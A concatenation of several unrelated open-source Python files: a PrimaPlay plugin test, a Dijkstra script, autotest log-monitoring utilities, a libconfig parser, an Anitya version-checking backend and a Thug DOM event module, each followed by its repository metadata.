prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
parser_account = PrimaPlay.Account( user, password, prima_play )
self.assertEqual(parser_account.login(), True)
def test_get_page__moje_play(self):
prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
page = prima_play.get_page('http://play.iprima.cz/moje-play')
self.assertEqual(page.player, None)
self.assertEqual(len(page.video_lists), 1)
self.assertEqual(page.video_lists[0].title, u'Moje oblíbené Spravovat oblíbené')
self.assertEqual(page.video_lists[0].link, None)
self.assertEqual(len(page.video_lists[0].item_list), 1)
self.assertEqual(page.video_lists[0].item_list[0].title,
u'Prostřeno! 13 Řad , 1023 Epizod')
self.assertEqual(page.video_lists[0].item_list[0].link,
'http://play.iprima.cz/prostreno')
self.assertEqual(len(page.filter_lists), 0)
if __name__ == '__main__':
unittest.main()
| alladdin/plugin.video.primaplay | libPrimaPlay/PrimaPlay_unittest.py | Python | gpl-2.0 | 12,829 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 19:41:46 2015
@author: deep
"""
from graph import weightedGraph
import heapq
def djikstra(a,S):
N = len(a.adjLst)
Visited = [False for i in xrange(N)]
Distance = [float('inf') for i in xrange(N)]
Distance[S] = 0
heap = []
heapq.heappush(heap,(0,S))
for i in xrange(N):
if heap:
while(True):
_,u = heapq.heappop(heap)
if not Visited[u]:
break
Visited[u] = True
for weight_uv,v in a.adjLst[u]:
if not Visited[v]:
if Distance[v] > Distance[u] + weight_uv:
Distance[v] = Distance[u] + weight_uv
heapq.heappush(heap, (Distance[v],v))
print Distance
return Distance
g = weightedGraph(4)
g.addEdge(0,1,1)
g.addEdge(1,2,2)
g.addEdge(2,3,3)
g.addEdge(3,0,4)
djikstra(g,0)
| ddeepak6992/Algorithms | Graph/Dijkstra.py | Python | gpl-2.0 | 935 |
# Shared utility functions across monitors scripts.
import fcntl, os, re, select, signal, subprocess, sys, time
TERM_MSG = 'Console connection unexpectedly lost. Terminating monitor.'
class Error(Exception):
pass
class InvalidTimestampFormat(Error):
pass
def prepend_timestamp(msg, format):
"""Prepend timestamp to a message in a standard way.
Args:
msg: str; Message to prepend timestamp to.
format: str or callable; Either format string that
can be passed to time.strftime or a callable
that will generate the timestamp string.
Returns: str; 'timestamp\tmsg'
"""
if type(format) is str:
timestamp = time.strftime(format, time.localtime())
elif callable(format):
timestamp = str(format())
else:
raise InvalidTimestampFormat
return '%s\t%s' % (timestamp, msg)
def write_logline(logfile, msg, timestamp_format=None):
"""Write msg, possibly prepended with a timestamp, as a terminated line.
Args:
logfile: file; File object to .write() msg to.
msg: str; Message to write.
timestamp_format: str or callable; If specified will
be passed into prepend_timestamp along with msg.
"""
msg = msg.rstrip('\n')
if timestamp_format:
msg = prepend_timestamp(msg, timestamp_format)
logfile.write(msg + '\n')
def make_alert(warnfile, msg_type, msg_template, timestamp_format=None):
"""Create an alert generation function that writes to warnfile.
Args:
warnfile: file; File object to write msg's to.
msg_type: str; String describing the message type
msg_template: str; String template that function params
are passed through.
timestamp_format: str or callable; If specified will
be passed into prepend_timestamp along with msg.
Returns: function with a signature of (*params);
The format for a warning used here is:
%(timestamp)d\t%(msg_type)s\t%(status)s\n
"""
if timestamp_format is None:
timestamp_format = lambda: int(time.time())
def alert(*params):
formatted_msg = msg_type + "\t" + msg_template % params
timestamped_msg = prepend_timestamp(formatted_msg, timestamp_format)
print >> warnfile, timestamped_msg
return alert
def build_alert_hooks(patterns_file, warnfile):
"""Parse data in patterns file and transform into alert_hook list.
Args:
patterns_file: file; File to read alert pattern definitions from.
warnfile: file; File to configure alert function to write warning to.
Returns:
list; Regex to alert function mapping.
[(regex, alert_function), ...]
"""
pattern_lines = patterns_file.readlines()
# expected pattern format:
# <msgtype> <newline> <regex> <newline> <alert> <newline> <newline>
# msgtype = a string categorizing the type of the message - used for
# enabling/disabling specific categories of warnings
# regex = a python regular expression
# alert = a string describing the alert message
# if the regex matches the line, this displayed warning will
# be the result of (alert % match.groups())
patterns = zip(pattern_lines[0::4], pattern_lines[1::4],
pattern_lines[2::4])
# assert that the patterns are separated by empty lines
if sum(len(line.strip()) for line in pattern_lines[3::4]) > 0:
raise ValueError('warning patterns are not separated by blank lines')
hooks = []
for msgtype, regex, alert in patterns:
regex = re.compile(regex.rstrip('\n'))
alert_function = make_alert(warnfile, msgtype.rstrip('\n'),
alert.rstrip('\n'))
hooks.append((regex, alert_function))
return hooks
def process_input(
input, logfile, log_timestamp_format=None, alert_hooks=()):
"""Continuously read lines from input stream and:
- Write them to log, possibly prefixed by timestamp.
- Watch for alert patterns.
Args:
input: file; Stream to read from.
logfile: file; Log file to write to
log_timestamp_format: str; Format to use for timestamping entries.
No timestamp is added if None.
alert_hooks: list; Generated from build_alert_hooks.
[(regex, alert_function), ...]
"""
while True:
line = input.readline()
if len(line) == 0:
# this should only happen if the remote console unexpectedly
# goes away. terminate this process so that we don't spin
# forever doing 0-length reads off of input
write_logline(logfile, TERM_MSG, log_timestamp_format)
break
if line == '\n':
# If it's just an empty line we discard and continue.
continue
write_logline(logfile, line, log_timestamp_format)
for regex, callback in alert_hooks:
match = re.match(regex, line.strip())
if match:
callback(*match.groups())
def lookup_lastlines(lastlines_dirpath, path):
"""Retrieve last lines seen for path.
Open corresponding lastline file for path
If there isn't one or isn't a match return None
Args:
lastlines_dirpath: str; Dirpath to store lastlines files to.
path: str; Filepath to source file that lastlines came from.
Returns:
str; Last lines seen if they exist
- Or -
None; Otherwise
"""
underscored = path.replace('/', '_')
try:
lastlines_file = open(os.path.join(lastlines_dirpath, underscored))
except (OSError, IOError):
return
lastlines = lastlines_file.read()
lastlines_file.close()
os.remove(lastlines_file.name)
if not lastlines:
return
try:
target_file = open(path)
except (OSError, IOError):
return
# Load it all in for now
target_data = target_file.read()
target_file.close()
# Get start loc in the target_data string, scanning from right
loc = target_data.rfind(lastlines)
if loc == -1:
return
# Then translate this into a reverse line number
# (count newlines that occur afterward)
reverse_lineno = target_data.count('\n', loc + len(lastlines))
return reverse_lineno
def write_lastlines_file(lastlines_dirpath, path, data):
"""Write data to lastlines file for path.
Args:
lastlines_dirpath: str; Dirpath to store lastlines files to.
path: str; Filepath to source file that data comes from.
data: str;
Returns:
str; Filepath that lastline data was written to.
"""
underscored = path.replace('/', '_')
dest_path = os.path.join(lastlines_dirpath, underscored)
open(dest_path, 'w').write(data)
return dest_path
def nonblocking(pipe):
"""Set python file object to nonblocking mode.
This allows us to take advantage of pipe.read()
where we don't have to specify a buflen.
Cuts down on a few lines we'd have to maintain.
Args:
pipe: file; File object to modify
Returns: pipe
"""
flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
fcntl.fcntl(pipe, fcntl.F_SETFL, flags| os.O_NONBLOCK)
return pipe
def launch_tails(follow_paths, lastlines_dirpath=None):
"""Launch a tail process for each follow_path.
Args:
follow_paths: list;
lastlines_dirpath: str;
Returns:
tuple; (procs, pipes) or
({path: subprocess.Popen, ...}, {file: path, ...})
"""
if lastlines_dirpath and not os.path.exists(lastlines_dirpath):
os.makedirs(lastlines_dirpath)
tail_cmd = ('/usr/bin/tail', '--retry', '--follow=name')
procs = {} # path -> tail_proc
pipes = {} # tail_proc.stdout -> path
for path in follow_paths:
cmd = list(tail_cmd)
if lastlines_dirpath:
reverse_lineno = lookup_lastlines(lastlines_dirpath, path)
if reverse_lineno is None:
reverse_lineno = 1
cmd.append('--lines=%d' % reverse_lineno)
cmd.append(path)
tail_proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
procs[path] = tail_proc
pipes[nonblocking(tail_proc.stdout)] = path
return procs, pipes
def poll_tail_pipes(pipes, lastlines_dirpath=None, waitsecs=5):
"""Wait on tail pipes for new data for waitsecs, return any new lines.
Args:
pipes: dict; {subprocess.Popen: follow_path, ...}
lastlines_dirpath: str; Path to write lastlines to.
waitsecs: int; Timeout to pass to select
Returns:
tuple; (lines, bad_pipes) or ([line, ...], [subprocess.Popen, ...])
"""
lines = []
bad_pipes = []
# Block until at least one is ready to read or waitsecs elapses
ready, _, _ = select.select(pipes.keys(), (), (), waitsecs)
for fi in ready:
path = pipes[fi]
data = fi.read()
if len(data) == 0:
# If no data, process is probably dead, add to bad_pipes
bad_pipes.append(fi)
continue
if lastlines_dirpath:
# Overwrite the lastlines file for this source path
# Probably just want to write the last 1-3 lines.
write_lastlines_file(lastlines_dirpath, path, data)
for line in data.splitlines():
lines.append('[%s]\t%s\n' % (path, line))
return lines, bad_pipes
def snuff(subprocs):
"""Helper for killing off remaining live subprocesses.
Args:
subprocs: list; [subprocess.Popen, ...]
"""
for proc in subprocs:
if proc.poll() is None:
os.kill(proc.pid, signal.SIGKILL)
proc.wait()
def follow_files(follow_paths, outstream, lastlines_dirpath=None, waitsecs=5):
"""Launch tail on a set of files and merge their output into outstream.
Args:
follow_paths: list; Local paths to launch tail on.
outstream: file; Output stream to write aggregated lines to.
lastlines_dirpath: Local dirpath to record last lines seen in.
waitsecs: int; Timeout for poll_tail_pipes.
"""
procs, pipes = launch_tails(follow_paths, lastlines_dirpath)
while pipes:
lines, bad_pipes = poll_tail_pipes(pipes, lastlines_dirpath, waitsecs)
for bad in bad_pipes:
pipes.pop(bad)
try:
outstream.writelines(['\n'] + lines)
outstream.flush()
except (IOError, OSError), e:
# Something is wrong. Stop looping.
break
snuff(procs.values())
| yochow/autotest | server/hosts/monitors/monitors_util.py | Python | gpl-2.0 | 10,543 |
#!/usr/bin/python
from __future__ import absolute_import, division, print_function
import sys
import os
import codecs
import collections
import io
import re
# Define an isstr() and isint() that work on both Python2 and Python3.
# See http://stackoverflow.com/questions/11301138
try:
basestring # attempt to evaluate basestring
def isstr(s):
return isinstance(s, basestring)
def isint(i):
return isinstance(i, (int, long))
except NameError:
def isstr(s):
return isinstance(s, str)
def isint(i):
return isinstance(i, int)
# Bounds to determine when an "L" suffix should be used during dump().
SMALL_INT_MIN = -2**31
SMALL_INT_MAX = 2**31 - 1
ESCAPE_SEQUENCE_RE = re.compile(r'''
( \\x.. # 2-digit hex escapes
| \\[\\'"abfnrtv] # Single-character escapes
)''', re.UNICODE | re.VERBOSE)
SKIP_RE = re.compile(r'\s+|#.*$|//.*$|/\*(.|\n)*?\*/', re.MULTILINE)
UNPRINTABLE_CHARACTER_RE = re.compile(r'[\x00-\x1F\x7F]')
# load() logic
##############
def decode_escapes(s):
'''Unescape libconfig string literals'''
def decode_match(match):
return codecs.decode(match.group(0), 'unicode-escape')
return ESCAPE_SEQUENCE_RE.sub(decode_match, s)
class AttrDict(collections.OrderedDict):
'''OrderedDict subclass giving access to string keys via attribute access
This class derives from collections.OrderedDict. Thus, the original
order of the config entries in the input stream is maintained.
'''
def __getattr__(self, attr):
if attr == '_OrderedDict__root':
# Work around Python2's OrderedDict weirdness.
raise AttributeError("AttrDict has no attribute %r" % attr)
return self.__getitem__(attr)
def __setitem__(self, name, value):
d = self
if name in d:
otype = type(d[name])
ntype = type(value)
if otype is not ntype:
msg = "cannot set '%s' to '%s', expecting type: '%s', given '%s'" % \
(name, str(value), otype.__name__, ntype.__name__)
raise AttributeError(msg)
super().__setitem__(name, value)
def __setattr__(self, name, value):
self[name] = value
class ConfigParseError(RuntimeError):
'''Exception class raised on errors reading the libconfig input'''
pass
class ConfigSerializeError(TypeError):
'''Exception class raised on errors serializing a config object'''
pass
class Token(object):
'''Base class for all tokens produced by the libconf tokenizer'''
def __init__(self, type, text, filename, row, column):
self.type = type
self.text = text
self.filename = filename
self.row = row
self.column = column
def __str__(self):
return "%r in %r, row %d, column %d" % (
self.text, self.filename, self.row, self.column)
class FltToken(Token):
'''Token subclass for floating point values'''
def __init__(self, *args, **kwargs):
super(FltToken, self).__init__(*args, **kwargs)
self.value = float(self.text)
class IntToken(Token):
'''Token subclass for integral values'''
def __init__(self, *args, **kwargs):
super(IntToken, self).__init__(*args, **kwargs)
self.is_long = self.text.endswith('L')
self.is_hex = (self.text[1:2].lower() == 'x')
self.value = int(self.text.rstrip('L'), 0)
class BoolToken(Token):
'''Token subclass for booleans'''
def __init__(self, *args, **kwargs):
super(BoolToken, self).__init__(*args, **kwargs)
self.value = (self.text[0].lower() == 't')
class StrToken(Token):
'''Token subclass for strings'''
def __init__(self, *args, **kwargs):
super(StrToken, self).__init__(*args, **kwargs)
self.value = decode_escapes(self.text[1:-1])
def compile_regexes(token_map):
return [(cls, type, re.compile(regex))
for cls, type, regex in token_map]
class Tokenizer:
'''Tokenize an input string
Typical usage:
tokens = list(Tokenizer("<memory>").tokenize("""a = 7; b = ();"""))
The filename argument to the constructor is used only in error messages, no
data is loaded from the file. The input data is received as argument to the
tokenize function, which yields tokens or throws a ConfigParseError on
invalid input.
Include directives are not supported, they must be handled at a higher
level (cf. the TokenStream class).
'''
token_map = compile_regexes([
(FltToken, 'float', r'([-+]?(\d+)?\.\d*([eE][-+]?\d+)?)|'
r'([-+]?(\d+)(\.\d*)?[eE][-+]?\d+)'),
(IntToken, 'hex64', r'0[Xx][0-9A-Fa-f]+(L(L)?)'),
(IntToken, 'hex', r'0[Xx][0-9A-Fa-f]+'),
(IntToken, 'integer64', r'[-+]?[0-9]+L(L)?'),
(IntToken, 'integer', r'[-+]?[0-9]+'),
(BoolToken, 'boolean', r'(?i)(true|false)\b'),
(StrToken, 'string', r'"([^"\\]|\\.)*"'),
(Token, 'name', r'[A-Za-z\*][-A-Za-z0-9_\*]*'),
(Token, '}', r'\}'),
(Token, '{', r'\{'),
(Token, ')', r'\)'),
(Token, '(', r'\('),
(Token, ']', r'\]'),
(Token, '[', r'\['),
(Token, ',', r','),
(Token, ';', r';'),
(Token, '=', r'='),
(Token, ':', r':'),
])
def __init__(self, filename):
self.filename = filename
self.row = 1
self.column = 1
def tokenize(self, string):
'''Yield tokens from the input string or throw ConfigParseError'''
pos = 0
while pos < len(string):
m = SKIP_RE.match(string, pos=pos)
if m:
skip_lines = m.group(0).split('\n')
if len(skip_lines) > 1:
self.row += len(skip_lines) - 1
self.column = 1 + len(skip_lines[-1])
else:
self.column += len(skip_lines[0])
pos = m.end()
continue
for cls, type, regex in self.token_map:
m = regex.match(string, pos=pos)
if m:
yield cls(type, m.group(0),
self.filename, self.row, self.column)
self.column += len(m.group(0))
pos = m.end()
break
else:
raise ConfigParseError(
"Couldn't load config in %r row %d, column %d: %r" %
(self.filename, self.row, self.column,
string[pos:pos+20]))
class TokenStream:
'''Offer a parsing-oriented view on tokens
Provide several methods that are useful to parsers, like ``accept()``,
``expect()``, ...
The ``from_file()`` method is the preferred way to read input files, as
it handles include directives, which the ``Tokenizer`` class does not do.
'''
def __init__(self, tokens):
self.position = 0
self.tokens = list(tokens)
@classmethod
def from_file(cls, f, filename=None, includedir='', seenfiles=None):
'''Create a token stream by reading an input file
Read tokens from `f`. If an include directive ('@include "file.cfg"')
is found, read its contents as well.
The `filename` argument is used for error messages and to detect
circular imports. ``includedir`` sets the lookup directory for included
files. ``seenfiles`` is used internally to detect circular includes,
and should normally not be supplied by users of is function.
'''
if filename is None:
filename = getattr(f, 'name', '<unknown>')
if seenfiles is None:
seenfiles = set()
if filename in seenfiles:
raise ConfigParseError("Circular include: %r" % (filename,))
seenfiles = seenfiles | {filename} # Copy seenfiles, don't alter it.
tokenizer = Tokenizer(filename=filename)
lines = []
tokens = []
for line in f:
m = re.match(r'@include "(.*)"$', line.strip())
if m:
tokens.extend(tokenizer.tokenize(''.join(lines)))
lines = [re.sub(r'\S', ' ', line)]
includefilename = decode_escapes(m.group(1))
includefilename = os.path.join(includedir, includefilename)
try:
includefile = open(includefilename, "r")
except IOError:
raise ConfigParseError("Could not open include file %r" %
(includefilename,))
with includefile:
includestream = cls.from_file(includefile,
filename=includefilename,
includedir=includedir,
seenfiles=seenfiles)
tokens.extend(includestream.tokens)
else:
lines.append(line)
tokens.extend(tokenizer.tokenize(''.join(lines)))
return cls(tokens)
def peek(self):
'''Return (but do not consume) the next token
At the end of input, ``None`` is returned.
'''
if self.position >= len(self.tokens):
return None
return self.tokens[self.position]
def accept(self, *args):
'''Consume and return the next token if it has the correct type
Multiple token types (as strings, e.g. 'integer64') can be given
as arguments. If the next token is one of them, consume and return it.
If the token type doesn't match, return None.
'''
token = self.peek()
if token is None:
return None
for arg in args:
if token.type == arg:
self.position += 1
return token
return None
def expect(self, *args):
'''Consume and return the next token if it has the correct type
Multiple token types (as strings, e.g. 'integer64') can be given
as arguments. If the next token is one of them, consume and return it.
If the token type doesn't match, raise a ConfigParseError.
'''
t = self.accept(*args)
if t is not None:
return t
self.error("expected: %r" % (args,))
def error(self, msg):
'''Raise a ConfigParseError at the current input position'''
if self.finished():
raise ConfigParseError("Unexpected end of input; %s" % (msg,))
else:
t = self.peek()
raise ConfigParseError("Unexpected token %s; %s" % (t, msg))
def finished(self):
'''Return ``True`` if the end of the token stream is reached.'''
return self.position >= len(self.tokens)
class Parser:
'''Recursive descent parser for libconfig files
Takes a ``TokenStream`` as input, the ``parse()`` method then returns
the config file data in a ``json``-module-style format.
'''
def __init__(self, tokenstream):
self.tokens = tokenstream
def parse(self):
return self.configuration()
def configuration(self):
result = self.setting_list_or_empty()
if not self.tokens.finished():
raise ConfigParseError("Expected end of input but found %s" %
(self.tokens.peek(),))
return result
def setting_list_or_empty(self):
result = AttrDict()
while True:
s = self.setting()
if s is None:
return result
result[s[0]] = s[1]
def setting(self):
name = self.tokens.accept('name')
if name is None:
return None
self.tokens.expect(':', '=')
value = self.value()
if value is None:
self.tokens.error("expected a value")
self.tokens.accept(';', ',')
return (name.text, value)
def value(self):
acceptable = [self.scalar_value, self.array, self.list, self.group]
return self._parse_any_of(acceptable)
def scalar_value(self):
# This list is ordered so that more common tokens are checked first.
acceptable = [self.string, self.boolean, self.integer, self.float,
self.hex, self.integer64, self.hex64]
return self._parse_any_of(acceptable)
def value_list_or_empty(self):
return tuple(self._comma_separated_list_or_empty(self.value))
def scalar_value_list_or_empty(self):
return self._comma_separated_list_or_empty(self.scalar_value)
def array(self):
return self._enclosed_block('[', self.scalar_value_list_or_empty, ']')
def list(self):
return self._enclosed_block('(', self.value_list_or_empty, ')')
def group(self):
return self._enclosed_block('{', self.setting_list_or_empty, '}')
def boolean(self):
return self._create_value_node('boolean')
def integer(self):
return self._create_value_node('integer')
def integer64(self):
return self._create_value_node('integer64')
def hex(self):
return self._create_value_node('hex')
def hex64(self):
return self._create_value_node('hex64')
def float(self):
return self._create_value_node('float')
def string(self):
t_first = self.tokens.accept('string')
if t_first is None:
return None
values = [t_first.value]
while True:
t = self.tokens.accept('string')
if t is None:
break
values.append(t.value)
return ''.join(values)
def _create_value_node(self, tokentype):
t = self.tokens.accept(tokentype)
if t is None:
return None
return t.value
def _parse_any_of(self, nonterminals):
for fun in nonterminals:
result = fun()
if result is not None:
return result
return None
def _comma_separated_list_or_empty(self, nonterminal):
values = []
first = True
while True:
v = nonterminal()
if v is None:
if first:
return []
else:
self.tokens.error("expected value after ','")
values.append(v)
if not self.tokens.accept(','):
return values
first = False
def _enclosed_block(self, start, nonterminal, end):
if not self.tokens.accept(start):
return None
result = nonterminal()
self.tokens.expect(end)
return result
def load(f, filename=None, includedir=''):
'''Load the contents of ``f`` (a file-like object) to a Python object
The returned object is a subclass of ``dict`` that exposes string keys as
attributes as well.
Example:
>>> with open('test/example.cfg') as f:
... config = libconf.load(f)
>>> config['window']['title']
'libconfig example'
>>> config.window.title
'libconfig example'
'''
if isinstance(f.read(0), bytes):
raise TypeError("uconf.load() input file must by unicode")
tokenstream = TokenStream.from_file(f,
filename=filename,
includedir=includedir)
return Parser(tokenstream).parse()
def loads(string, filename=None, includedir=''):
'''Load the contents of ``string`` to a Python object
The returned object is a subclass of ``dict`` that exposes string keys as
attributes as well.
Example:
>>> config = libconf.loads('window: { title: "libconfig example"; };')
>>> config['window']['title']
'libconfig example'
>>> config.window.title
'libconfig example'
'''
try:
f = io.StringIO(string)
except TypeError:
raise TypeError("libconf.loads() input string must by unicode")
return load(f, filename=filename, includedir=includedir)
# dump() logic
##############
def dump_int(i):
'''Stringize ``i``, append 'L' if ``i`` is exceeds the 32-bit int range'''
return str(i) + ('' if SMALL_INT_MIN <= i <= SMALL_INT_MAX else 'L')
def dump_string(s):
'''Stringize ``s``, adding double quotes and escaping as necessary
Backslash escape backslashes, double quotes, ``\f``, ``\n``, ``\r``, and
``\t``. Escape all remaining unprintable characters in ``\xFF``-style.
The returned string will be surrounded by double quotes.
'''
s = (s.replace('\\', '\\\\')
.replace('"', '\\"')
.replace('\f', r'\f')
.replace('\n', r'\n')
.replace('\r', r'\r')
.replace('\t', r'\t'))
s = UNPRINTABLE_CHARACTER_RE.sub(
lambda m: r'\x{:02x}'.format(ord(m.group(0))),
s)
return '"' + s + '"'
def dump_value(key, value, f, indent=0):
'''Save a value of any libconfig type
This function serializes takes ``key`` and ``value`` and serializes them
into ``f``. If ``key`` is ``None``, a list-style output is produced.
Otherwise, output has ``key = value`` format.
'''
spaces = ' ' * indent
if key is None:
key_prefix = ''
key_prefix_nl = ''
else:
key_prefix = key + ' = '
key_prefix_nl = key + ' = ' + spaces
if isinstance(value, dict):
f.write(u'{}{}{{\n'.format(spaces, key_prefix_nl))
dump_dict(value, f, indent + 4)
f.write(u'{}}}'.format(spaces))
elif isinstance(value, tuple):
f.write(u'{}{}(\n'.format(spaces, key_prefix_nl))
dump_collection(value, f, indent + 4)
f.write(u'\n{})'.format(spaces))
elif isinstance(value, list):
f.write(u'{}{}[\n'.format(spaces, key_prefix_nl))
dump_collection(value, f, indent + 4)
f.write(u'\n{}]'.format(spaces))
elif isstr(value):
f.write(u'{}{}{}'.format(spaces, key_prefix, dump_string(value)))
elif isint(value):
f.write(u'{}{}{}'.format(spaces, key_prefix, dump_int(value)))
elif isinstance(value, float):
f.write(u'{}{}{}'.format(spaces, key_prefix, value))
else:
raise ConfigSerializeError("Can not serialize object %r of type %s" %
(value, type(value)))
def dump_collection(cfg, f, indent=0):
'''Save a collection of attributes'''
for i, value in enumerate(cfg):
dump_value(None, value, f, indent)
if i < len(cfg) - 1:
f.write(u',\n')
def dump_dict(cfg, f, indent=0):
'''Save a dictionary of attributes'''
for key in cfg:
if not isstr(key):
raise ConfigSerializeError("Dict keys must be strings: %r" %
(key,))
dump_value(key, cfg[key], f, indent)
f.write(u'\n')
def dumps(cfg):
'''Serialize ``cfg`` into a libconfig-formatted ``str``
``cfg`` must be a ``dict`` with ``str`` keys and libconf-supported values
(numbers, strings, booleans, possibly nested dicts, lists, and tuples).
Returns the formatted string.
'''
str_file = io.StringIO()
dump(cfg, str_file)
return str_file.getvalue()
def dump(cfg, f):
'''Serialize ``cfg`` as a libconfig-formatted stream into ``f``
``cfg`` must be a ``dict`` with ``str`` keys and libconf-supported values
(numbers, strings, booleans, possibly nested dicts, lists, and tuples).
``f`` must be a ``file``-like object with a ``write()`` method.
'''
if not isinstance(cfg, dict):
raise ConfigSerializeError(
'dump() requires a dict as input, not %r of type %r' %
(cfg, type(cfg)))
dump_dict(cfg, f, 0)
def namespace(): return AttrDict()
def isnamespace(v): return isinstance(v, dict)
| uDeviceX/uDeviceX | pre/uconf/src/uconf.py | Python | gpl-2.0 | 20,089 |
# -*- coding: utf-8 -*-
"""
(c) 2014 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from anitya.lib.backends import (
BaseBackend, get_versions_by_regex_for_text, REGEX)
from anitya.lib.exceptions import AnityaPluginException
import six
DEFAULT_REGEX = 'href="([0-9][0-9.]*)/"'
class FolderBackend(BaseBackend):
''' The custom class for project having a special hosting.
This backend allows to specify a version_url and a regex that will
be used to retrieve the version information.
'''
name = 'folder'
examples = [
'http://ftp.gnu.org/pub/gnu/gnash/',
'http://subsurface.hohndel.org/downloads/',
]
@classmethod
def get_version(cls, project):
''' Method called to retrieve the latest version of the projects
provided, project that relies on the backend of this plugin.
:arg Project project: a :class:`model.Project` object whose backend
corresponds to the current plugin.
:return: the latest version found upstream
:return type: str
:raise AnityaPluginException: a
:class:`anitya.lib.exceptions.AnityaPluginException` exception
when the version cannot be retrieved correctly
'''
return cls.get_ordered_versions(project)[-1]
@classmethod
def get_versions(cls, project):
''' Method called to retrieve all the versions (that can be found)
of the projects provided, project that relies on the backend of
this plugin.
:arg Project project: a :class:`model.Project` object whose backend
corresponds to the current plugin.
:return: a list of all the possible releases found
:return type: list
:raise AnityaPluginException: a
:class:`anitya.lib.exceptions.AnityaPluginException` exception
when the versions cannot be retrieved correctly
'''
url = project.version_url
try:
req = cls.call_url(url, insecure=project.insecure)
except Exception as err:
raise AnityaPluginException(
'Could not call : "%s" of "%s", with error: %s' % (
url, project.name, str(err)))
versions = None
if not isinstance(req, six.string_types):
req = req.text
try:
regex = REGEX % {'name': project.name.replace('+', '\+')}
versions = get_versions_by_regex_for_text(
req, url, regex, project)
except AnityaPluginException:
versions = get_versions_by_regex_for_text(
req, url, DEFAULT_REGEX, project)
return versions
| pombredanne/anitya | anitya/lib/backends/folder.py | Python | gpl-2.0 | 2,702 |
#!/usr/bin/env python
from thug.DOM.W3C.Core.DOMException import DOMException
from .HTMLEvent import HTMLEvent
from .MouseEvent import MouseEvent
from .MutationEvent import MutationEvent
from .StorageEvent import StorageEvent
from .UIEvent import UIEvent
EventMap = {
"HTMLEvent" : HTMLEvent,
"HTMLEvents" : HTMLEvent,
"MouseEvent" : MouseEvent,
"MouseEvents" : MouseEvent,
"MutationEvent" : MutationEvent,
"MutationEvents" : MutationEvent,
"StorageEvent" : StorageEvent,
"UIEvent" : UIEvent,
"UIEvents" : UIEvent
}
# Introduced in DOM Level 2
class DocumentEvent(object):
def __init__(self, doc):
self.doc = doc
def createEvent(self, eventType):
if eventType not in EventMap:
raise DOMException(DOMException.NOT_SUPPORTED_ERR)
return EventMap[eventType]()
| pdelsante/thug | thug/DOM/W3C/Events/DocumentEvent.py | Python | gpl-2.0 | 876 |